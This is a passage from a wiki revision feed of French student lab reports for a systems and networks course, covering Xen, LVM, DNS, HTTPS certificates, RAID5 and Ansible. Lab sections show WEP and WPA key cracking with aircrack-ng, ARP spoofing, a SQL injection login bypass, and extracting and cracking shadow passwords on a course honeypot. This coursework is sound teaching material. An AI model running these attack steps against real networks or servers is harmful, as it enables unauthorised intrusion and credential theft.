&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
==Procedure==&lt;br /&gt;
Dans cette partie nous suivons la procédure détaillée de gandi : https://docs.gandi.net/fr/ssl/operations_courantes/csr.html.&lt;br /&gt;
&lt;br /&gt;
Celle-ci consiste à générer les clés avec la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout stropharia.site.key -out stropharia.site.csr&lt;br /&gt;
&lt;br /&gt;
Et de demander à gandi de signer le certificat .csr afin d'obtenir le .crt. On note que le prix annoncé de 12€ passe à 0€ lors du paiement si c'est le premier.&lt;br /&gt;
&lt;br /&gt;
Avant de délivrer le certificat signé gandi doit vérifier que nous possédons bien le nom de domaine. Pour cela une des méthodes possibles est d'envoyer un mail à admin@stropharia.site.&lt;br /&gt;
&lt;br /&gt;
==Configuration du serveur de mail pour la vérification==&lt;br /&gt;
&lt;br /&gt;
Nous utilisons le programme postfix pour la récupération des mails.&lt;br /&gt;
&lt;br /&gt;
Après l'avoir installé nous ajoutons un un alias entre l'utilisateur admin et root afin de recevoir le mail de gandi sur un utilisateur existant.&lt;br /&gt;
&lt;br /&gt;
 #vi /etc/aliases&lt;br /&gt;
 # See man 5 aliases for format&lt;br /&gt;
 postmaster:    root&lt;br /&gt;
 admin:    root&lt;br /&gt;
&lt;br /&gt;
Afin de recevoir les mails nous ajoutons aussi la ligne suivante au fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
&lt;br /&gt;
Pour l'agent de courriel nous utilsons Bsd-mailx :&lt;br /&gt;
 apt-get install -y bsd-mailx #install mailx&lt;br /&gt;
 postalias /etc/aliases # met à jour la base des alias pour prendre en compte admin:root&lt;br /&gt;
 mailx #lancement de la commande pour voir les mails recus&lt;br /&gt;
&lt;br /&gt;
On clique ensuite sur le lien et gandi et entrons le mot de passe de vérification reçu. Peut après on peut télécharger notre .crt ainsi que le fichier GandiStandardSSLCA2.pem.&lt;br /&gt;
&lt;br /&gt;
Finalement on place ces fichiers à coté de notre clé privée dans le répertoire /etc/ssl&lt;br /&gt;
 #ls /etc/ssl | less&lt;br /&gt;
 GandiStandardSSLCA2.pem&lt;br /&gt;
 certs&lt;br /&gt;
 openssl.cnf&lt;br /&gt;
 private&lt;br /&gt;
 stropharia.site.crt&lt;br /&gt;
 stropharia.site.key&lt;br /&gt;
&lt;br /&gt;
==Configuration d'apache2==&lt;br /&gt;
Une fois le CSR signé nous devons configurer apache 2 pour gérer du HTTPS sur le port 443.&lt;br /&gt;
&lt;br /&gt;
On commence par l'installer :&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
puis on active le module ssl :&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le fichier /etc/apache2/sites-enabled/000-default.conf pour rediriger le traffic http du port 80 vers le port 443 :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName www.stropharia.site&lt;br /&gt;
         '''Redirect / https://www.stropharia.site'''&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html&lt;br /&gt;
         ...&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et configurer les mots clés SSLCertificateKeyFile, SSLCertificateFile et SSLCertificateChainFile pour la connection sécurisé selon l'énoncé :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost _default_:443&amp;gt;                                                     &lt;br /&gt;
   ServerName www.stropharia.site                                                &lt;br /&gt;
   DocumentRoot /var/www/html                                                    &lt;br /&gt;
   SSLEngine On                                                                  &lt;br /&gt;
   '''SSLCertificateFile''' /etc/ssl/stropharia.site.crt                               &lt;br /&gt;
   '''SSLCertificateKeyFile''' /etc/ssl/stropharia.site.key                            &lt;br /&gt;
   '''SSLCertificateChainFile''' /etc/ssl/GandiStandardSSLCA2.pem&lt;br /&gt;
   SSLVerifyClient None                                                          &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons également un record dans le fichier /etc/bind/db.stropharia.site pour définir www.stropharia.site :&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55163</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55163"/>
				<updated>2020-12-22T00:45:07Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration d'apache2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
==Procedure==&lt;br /&gt;
Dans cette partie nous suivons la procédure détaillée de gandi : https://docs.gandi.net/fr/ssl/operations_courantes/csr.html.&lt;br /&gt;
&lt;br /&gt;
Celle-ci consiste à générer les clés avec la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout stropharia.site.key -out stropharia.site.csr&lt;br /&gt;
&lt;br /&gt;
Et de demander à gandi de signer le certificat .csr afin d'obtenir le .crt. On note que le prix annoncé de 12€ passe à 0€ lors du paiement si c'est le premier.&lt;br /&gt;
&lt;br /&gt;
Avant de délivrer le certificat signé gandi doit vérifier que nous possédons bien le nom de domaine. Pour cela une des méthodes possibles est d'envoyer un mail à admin@stropharia.site.&lt;br /&gt;
&lt;br /&gt;
==Configuration du serveur de mail pour la vérification==&lt;br /&gt;
&lt;br /&gt;
Nous utilisons le programme postfix pour la récupération des mails.&lt;br /&gt;
&lt;br /&gt;
Après l'avoir installé nous ajoutons un un alias entre l'utilisateur admin et root afin de recevoir le mail de gandi sur un utilisateur existant.&lt;br /&gt;
&lt;br /&gt;
 #vi /etc/aliases&lt;br /&gt;
 # See man 5 aliases for format&lt;br /&gt;
 postmaster:    root&lt;br /&gt;
 admin:    root&lt;br /&gt;
&lt;br /&gt;
Afin de recevoir les mails nous ajoutons aussi la ligne suivante au fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
&lt;br /&gt;
Pour l'agent de courriel nous utilsons Bsd-mailx :&lt;br /&gt;
 apt-get install -y bsd-mailx #install mailx&lt;br /&gt;
 postalias /etc/aliases # met à jour la base des alias pour prendre en compte admin:root&lt;br /&gt;
 mailx #lancement de la commande pour voir les mails recus&lt;br /&gt;
&lt;br /&gt;
On clique ensuite sur le lien et gandi et entrons le mot de passe de vérification reçu. Peut après on peut télécharger notre .crt ainsi que le fichier GandiStandardSSLCA2.pem.&lt;br /&gt;
&lt;br /&gt;
Finalement on place ces fichiers à coté de notre clé privée dans le répertoire /etc/ssl&lt;br /&gt;
 #ls /etc/ssl | less&lt;br /&gt;
 GandiStandardSSLCA2.pem&lt;br /&gt;
 certs&lt;br /&gt;
 openssl.cnf&lt;br /&gt;
 private&lt;br /&gt;
 stropharia.site.crt&lt;br /&gt;
 stropharia.site.key&lt;br /&gt;
&lt;br /&gt;
==Configuration d'apache2==&lt;br /&gt;
Une fois le CSR signé nous devons configurer apache 2 pour gérer du HTTPS sur le port 443.&lt;br /&gt;
&lt;br /&gt;
On commence par l'installer :&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
puis on active le module ssl :&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le fichier /etc/apache2/sites-enabled/000-default.conf pour rediriger le traffic http du port 80 vers le port 443 :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName www.stropharia.site&lt;br /&gt;
         '''Redirect / https://www.stropharia.site'''&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html&lt;br /&gt;
         ...&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et configurer les mots clés SSLCertificateKeyFile, SSLCertificateFile et SSLCertificateChainFile pour la connection sécurisé selon l'énoncé :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost _default_:443&amp;gt;                                                     &lt;br /&gt;
   ServerName www.stropharia.site                                                &lt;br /&gt;
   DocumentRoot /var/www/html                                                    &lt;br /&gt;
   SSLEngine On                                                                  &lt;br /&gt;
   '''SSLCertificateFile''' /etc/ssl/stropharia.site.crt                               &lt;br /&gt;
   '''SSLCertificateKeyFile''' /etc/ssl/stropharia.site.key                            &lt;br /&gt;
   '''SSLCertificateChainFile''' /etc/ssl/GandiStandardSSLCA2.pem&lt;br /&gt;
   SSLVerifyClient None                                                          &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
